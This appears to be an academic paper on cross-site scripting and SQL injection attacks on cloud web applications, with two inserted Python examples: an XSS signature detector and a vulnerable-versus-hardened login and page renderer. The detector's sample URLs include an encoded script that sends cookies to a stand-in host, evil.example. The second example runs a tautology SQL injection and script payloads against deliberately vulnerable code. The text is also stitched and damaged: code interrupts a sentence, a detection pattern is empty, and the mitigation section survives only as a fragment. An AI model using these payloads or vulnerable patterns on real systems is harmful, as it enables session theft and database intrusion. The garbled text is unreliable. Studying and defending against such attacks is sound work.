Journal of Computer Science Engineering and Software Testing Volume 1 Issue 2
Web Based XSS and SQL Attacks on Cloud and Mitigation
Neeta Sharma1, Mahtab Alam1, Mayank Singh2
1 Department of Computer Science Engineering, Noida International University, India
2 Department of Computer Science Engineering, Krishna Engineering College, India
Abstract
A key technology enabling the use of Software as a Service (SaaS) in cloud computing is Web 2.0, which relieves users of tasks such as installation and maintenance. Web-based applications are now considered the fastest way to provide on-line information and are used widely all over the world. As the use of web-based applications grows, their vulnerabilities are being discovered and disclosed at an alarming rate, and cloud computing systems face web-based software security problems. These attacks exploit vulnerabilities in the authorization, authentication and accounting of cloud systems. Malicious programs can be uploaded to cloud systems to cause damage: an attacker exploits the system by injecting malicious script into dynamically generated web pages, which allows the capture of private session information. Cloud systems are susceptible to malware injection attacks, and their security risks and threats are investigated here based on the nature of the cloud service models. It is essential to identify the possible cloud attacks and threats in order to implement better security mechanisms that protect the cloud computing environment. In this paper we present the two most prominent categories of web-based malware injection on the cloud, cross-site scripting and SQL injection attacks, the techniques used to attack websites, and some mitigation techniques to avoid such attacks.
Keywords: Cross-site scripting, cloud computing, DOM based attack, SaaS, persistent attack, non-persistent attack, web
Page 1-10 © MAT Journals 2015. All Rights Reserved
INTRODUCTION
Web-based applications generally provide dynamic web pages that let Internet users access applications (such as an e-mail or banking system) through a web browser. Cloud applications delivered as SaaS (Software as a Service) are also vulnerable to malware injection attacks. Web servers are exposed to web-based attacks, which include injection flaws, cross-site scripting, weak session management, broken authentication, information leakage, improper data validation, failure to restrict URL access, insecure communications and malicious program execution. Attackers inject a malicious program into target cloud virtual machines and applications on the different service models, PaaS, IaaS and SaaS [1]. Once the attack is launched successfully, the malicious code executes as one of the valid instances running in the cloud, and the attacker can then do whatever he or she desires, such as data theft, eavesdropping and manipulation of data. SQL injection and XSS attacks are the most prominent attacks against the web applications of cloud computing systems.

Cross-site scripting is a type of computer security vulnerability commonly found in web-based applications: information from one context, where it is not trusted, can be inserted into another context, where it is trusted, and an attack can then be launched. If the web server application that generates web pages fails to validate user input and to ensure that the generated pages are properly encoded, it can easily be exploited. An attacker performs this in a number of ways, such as by inserting a link in a message or in a spam message; it can also be carried out using e-mail spoofing that pretends to come from a trusted source.

TYPE OF MALWARE INJECTION ATTACKS
The two most common malware injection attacks against the web applications of cloud computing are SQL injection and cross-site scripting attacks.

Cross-Site Scripting Attack
Cross-site scripting is a kind of exploitation and a powerful phishing attack. In this attack, usually a hyperlink carrying malicious code is used to gather data. After the web application collects the data, the malicious data is sent back to the user in the form of an output page, and the user believes it is valid content from the website [2]. Cross-site scripting is the most common attack for retrieving information stored in user cookies, which creates a confidentiality problem. The attacker gains the ability to capture session information such as user IDs, passwords, credit card information and more. With this type of attack, an attacker can
change the user's settings and hijack the account, steal cookies or inject false advertising. In some situations it is even possible for the attacker to run arbitrary code on a victim's computer when XSS is combined with other flaws. Martin states that cross-site scripting has become the main software flaw used to exploit software and applications [3].

Cross-site scripting is usually sidelined since it does not directly affect the organization but rather its users. An attacker uses an exploitable cross-site scripting vulnerability to bypass access controls such as the same-origin policy. XSS attacks are easier to detect than other attacks; however, many IPS (Intrusion Prevention Systems) fail to accomplish this detection. XSS is perceived as a minimal threat by many security experts and developers [4]; the reason behind this perception is its easy detection by signature. Cross-site scripting attacks can be detected accurately by knowing the source, time and type of signature. A cross-site scripting attack occurs either with malicious pages or with parameter values. Therefore, a system that detects cross-site scripting should look for scripting signatures either within parameters or within the requests that return exception handlers. To find signatures in parameter values, the system should correctly parse the URL, retrieve the value part, and only then search the value for the signature, so that encoding cannot hide it; to find signatures in pages that return error messages, the system needs to know the specific URL which returned the error code. The simple text pattern “” can be used to detect cross-site scripting attacks. For protection against cross-site scripting attacks, experts suggest that web application servers should include appropriate security mechanisms and validate user input. Cross-site scripting mitigation requires the efforts of
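The detection procedure described above (parse the URL, take the value part of each parameter, decode it, then look for a scripting signature) can be written out as follows. This is an added example, not code from the paper or its authors; the signature list, the function names (normalize, find_signatures, is_suspicious) and the sample URLs are constructed for this illustration.

```python
"""
Added example (not from the paper): signature-based detection of cross-site
scripting attempts in URL parameter values, following the procedure described
in the text: parse the URL, isolate the value part of each parameter, decode it
so that encoding does not hide the payload, then search for scripting signatures.
The signature list and the sample URLs are constructed for this illustration.
"""
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed signature list: fragments an attacker needs in order to get
# script executed. They are matched against the decoded, lower-cased value.
SIGNATURES = (
    "<script",
    "javascript:",
    "onerror=",
    "onload=",
    "<img",
    "<iframe",
    "document.cookie",
)


def normalize(value, rounds=3):
    """Undo the encoding layers an attacker stacks on a payload.

    Percent-decoding is repeated (double encoding is a classic filter bypass),
    then HTML entities are decoded, then characters browsers ignore inside
    tokens (tab, newline, NUL) are dropped, and the result is lower-cased.
    """
    decoded = value
    for _ in range(rounds):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    decoded = html.unescape(decoded)
    decoded = re.sub(r"[\t\r\n\x00]", "", decoded)
    return decoded.lower()


def find_signatures(url):
    """Return (parameter, signature) pairs found in the URL's query values.

    Only values are inspected, as the text recommends. The fragment (#...) is
    checked too: it never reaches the server in a live request, but it is where
    a DOM-based (Type-0) payload lives when such URLs turn up in mail or logs.
    """
    parts = urlsplit(url)
    candidates = list(parse_qsl(parts.query, keep_blank_values=True))
    if parts.fragment:
        candidates.append(("#fragment", parts.fragment))
    hits = []
    for key, value in candidates:
        norm = normalize(value)
        for sig in SIGNATURES:
            if sig in norm:
                hits.append((key, sig))
    return hits


def is_suspicious(url):
    """True when at least one signature is present in the request."""
    return bool(find_signatures(url))


# Constructed sample requests, in the form they would appear in an access log.
SAMPLE_URLS = [
    "https://shop.example/search?q=blue+shoes&page=2",
    "https://shop.example/search?q=%3Cscript%3Elocation%3D%27http%3A%2F%2Fevil.example%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E",
    "https://shop.example/item?name=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E",
    "https://shop.example/profile?bio=%26lt%3Bscript%26gt%3Balert(1)",
    "https://shop.example/view#<script>alert(document.cookie)</script>",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(is_suspicious(url), find_signatures(url), url)
```

Run stand-alone, the script prints one line per sample URL. Two caveats a practitioner should keep in mind: signature matching of this kind is a detection aid, not a defence, since an attacker can pick a tag or event handler that is not on the list (the decoding steps only close the encoding bypasses the text mentions); and the second, third and fourth samples show why decoding must happen before matching, as none of those raw requests contains a literal script tag at all. The reliable fix remains the one the text names next: validate input and encode output at the server.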
Fig. 1: Cross-Site Scripting Attack. (Diagram labels: Email Client, Browser Window, Malicious Code, Fetched Code, Normal Interaction.)
server administrators, browser manufacturers and application developers, and it is better to keep in mind that web-application security practice should be a continually growing process [5–7]. Figure 1 above shows the process of cross-site scripting.

SQL Injection Attack
An SQL injection attack can take advantage of a security vulnerability in cloud software. This means that attackers can exploit vulnerable web servers by injecting malicious code to gain unauthorized access to the database. In this attack, the attacker's main target is SQL servers that run vulnerable database applications. Generally this attack is launched with the help of a botnet (a thousand bots equipped with an SQL injection kit were used to fire one such attack), and if the attacker launches it successfully he or she can remotely retrieve sensitive data, manipulate the content of the database and even take control of the web server by executing system commands [8, 9]. In the cloud computing environment, retailers host their products and sell them online using SaaS applications, and these can be victimized by a botnet-driven SQL injection attack. Some classes of SQL injection attack are:
• Inference or blind SQL injection.
• DBMS-specific.
• Compounded SQL injection:
  o SQL injection + insufficient authentication [10].
  o SQL injection + DDoS attacks [11].
  o SQL injection + DNS hijacking [12].
  o SQL injection + XSS [13].

CATEGORIES OF XSS (CROSS-SITE SCRIPTING) ATTACK
Cross-site scripting is the most common and prominent web-application vulnerability, and there are three standard vectors used for its execution; whichever vector is used, the result is the same. The main motive behind an XSS attack is the installation or execution of malicious code on web-based applications. The categories are as follows:

Type-0 XSS Attack
Type-0 or local XSS is known as DOM (Document Object Model) based XSS. In this type the problem exists within the client-side page script itself. This category relies completely on JavaScript that has
the ability to run with the privileges of the local zone if the code is executed on the client machine; for example, an attacker can hijack the session by sending malicious code through an e-mail or via another mechanism, and then use the web page with the privileges of the affected user.

Type-1 XSS Attack
Type-1 or non-persistent XSS is known as reflected XSS. In this category, an attacker sends dangerous content to a vulnerable web application, which reflects it back to the user, where the web browser executes it. The most frequent method in this category is to include malicious content in a URL as a parameter that is sent directly, e-mailed, or posted publicly to a vulnerable site. As soon as the site reflects the attacker's content to the user, the content is executed and starts transferring private information to the attacker.

Type-2 XSS Attack
Type-2 or stored XSS is known as persistent cross-site scripting and is also referred to as a second-order cross-site scripting vulnerability. This category is considered the most powerful XSS attack. It occurs when an attacker injects malicious content into a database that is later read and included in dynamic content. The injected content is stored in an optimal place that is displayed either to many users or to particular victims. The victims typically interact with sensitive data which is valuable to the attacker. When the user's browser executes the malicious content, the attacker may be able to perform privileged operation(s) on behalf of the user and gain access to the user's sensitive data [6].

Advanced XSS Attack
Advanced XSS attack vectors are the combination of XSS and phishing (a technique to exploit a website by creating a very similar site which imitates the original site in every aspect, often using a similar-looking domain name) attacks, which diminishes the chance of an average user recognizing the attack. The user is then tricked into accessing the imitating site and providing logon credentials, which the attacker can use to log in to the real site. The phishing activity can be disguised and carried out using the following techniques:

Page Rewriting
Page rewriting with XSS can take advantage of the phishing concept without leaving the site, by using JavaScript which blanks the targeted page and rewrites its code as a formal login page.
The page appears genuine, so users do not suspect the forged page; however, the login form points to the attacker-controlled server machine rather than the real site.

converting these characters to their HTML equivalents [8]. (, ), [, ], >, ;, :,
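As an added example, not taken from the paper, the following script puts the two attack classes of this paper side by side with their mitigations: a login check built by string formatting (the "SQL injection + insufficient authentication" class listed in the SQL Injection Attack section) beside a parameterized query, and a page renderer that reflects or stores user input (Type-1 and Type-2 XSS) beside one that converts the characters listed above, among others, to their HTML numeric entities. SQLite is used only so that it runs offline; the tables, users and payloads are constructed for the illustration and the function names are hypothetical.

```python
"""
Added example (not from the paper): a minimal cloud-application login check
and page renderer, each in the vulnerable form described in the text and in
a hardened form. The table layout, the users and the payloads are constructed
for this illustration.
"""
import sqlite3


def make_db():
    """In-memory SQLite database standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE comments (author TEXT, body TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


# --- SQL injection: string-built query vs. parameterized query -----------------

def login_vulnerable(conn, username, password):
    """Builds the query by string formatting, so the input is parsed as SQL.
    This is the 'SQL injection + insufficient authentication' class.
    Returns the matched username, or None."""
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Binds the input as parameters; quotes and comments inside it stay data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


# --- XSS: raw reflection vs. HTML-encoded output -------------------------------

# Characters that carry meaning in HTML or JavaScript, mapped to numeric
# entities. The set extends the paper's list with quotes and the ampersand,
# which a browser also needs to see encoded.
HTML_ENCODE = {c: "&#%d;" % ord(c) for c in "&<>\"'()[];:/="}


def html_encode(value):
    """Encode every character in HTML_ENCODE; everything else passes through."""
    return "".join(HTML_ENCODE.get(c, c) for c in value)


def render_greeting_vulnerable(name):
    """Reflects a request parameter straight into the page (Type-1 XSS)."""
    return "<h1>Welcome, %s!</h1>" % name


def render_greeting_safe(name):
    """Same page, but the browser now sees the payload as text, not markup."""
    return "<h1>Welcome, %s!</h1>" % html_encode(name)


def post_comment(conn, author, body):
    """Parameterized insert: immune to SQL injection, but it faithfully stores
    a script payload, which is why stored (Type-2) XSS is a renderer problem."""
    conn.execute("INSERT INTO comments VALUES (?, ?)", (author, body))


def render_comments(conn, encode):
    """Render all comments for another user; encode=False shows the Type-2 flaw."""
    rows = conn.execute("SELECT author, body FROM comments ORDER BY rowid").fetchall()
    enc = html_encode if encode else (lambda s: s)
    return "".join("<p><b>%s</b>: %s</p>" % (enc(a), enc(b)) for a, b in rows)


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"
    print("vulnerable login, bogus user + tautology:", login_vulnerable(db, "nobody", tautology))
    print("parameterized login, same input:        ", login_safe(db, "nobody", tautology))
    payload = "<script>alert(document.cookie)</script>"
    print(render_greeting_vulnerable(payload))
    print(render_greeting_safe(payload))
    post_comment(db, "mallory", payload)
    print(render_comments(db, encode=False))
    print(render_comments(db, encode=True))
```

The last two functions make the point that the "SQL injection + XSS" class hints at: a parameterized insert protects the database but stores the script payload faithfully, so the stored attack is only stopped by encoding at render time; the two mitigations are not interchangeable. The entity encoding shown is correct for text placed in HTML element content; a value placed inside an attribute, a URL or a script block needs the encoding rules of that context instead.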